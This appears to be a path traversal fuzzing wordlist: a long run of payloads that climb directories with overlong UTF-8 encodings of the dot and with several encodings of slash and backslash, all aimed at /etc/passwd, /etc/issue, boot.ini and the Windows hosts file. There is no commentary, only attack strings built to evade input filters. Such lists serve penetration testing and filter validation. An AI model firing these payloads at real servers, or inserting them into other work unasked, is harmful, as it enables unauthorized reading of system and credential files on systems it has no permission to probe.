-%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cetc%5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cetc%5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cetc%5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cetc%5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cetc%5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cetc%5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cetc%5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fetc0x2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fetc0x2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fetc0x2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fetc0x2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fetc0x2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fetc0x2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fetc0x2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fetc0x2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fetc0x2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fetc0x2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fetc0x2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fetc0x2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cetc0x5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cetc0x5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cetc0x5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cetc0x5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cetc0x5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cetc0x5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cetc0x5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cetc0x5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cetc0x5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cetc0x5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cetc0x5cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cetc0x5cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5c%fc%80%80%80%80%ae%fc%80%80%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fetc%252fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fetc%252fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fetc%252fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fetc%252fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fetc%252fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fetc%252fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fetc%252fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fetc%252fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fetc%252fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fetc%252fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fetc%252fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fetc%252fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cetc%255cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cetc%255cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cetc%255cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cetc%255cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cetc%255cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cetc%255cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cetc%255cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cetc%255cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cetc%255cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cetc%255cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cetc%255cpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cetc%255cissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255c%fc%80%80%80%80%ae%fc%80%80%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fetc%c0%2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fetc%c0%2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fetc%c0%2fpasswd -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fetc%c0%2fissue -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fboot.ini -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2f%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%2fetc%c0%2fpasswd 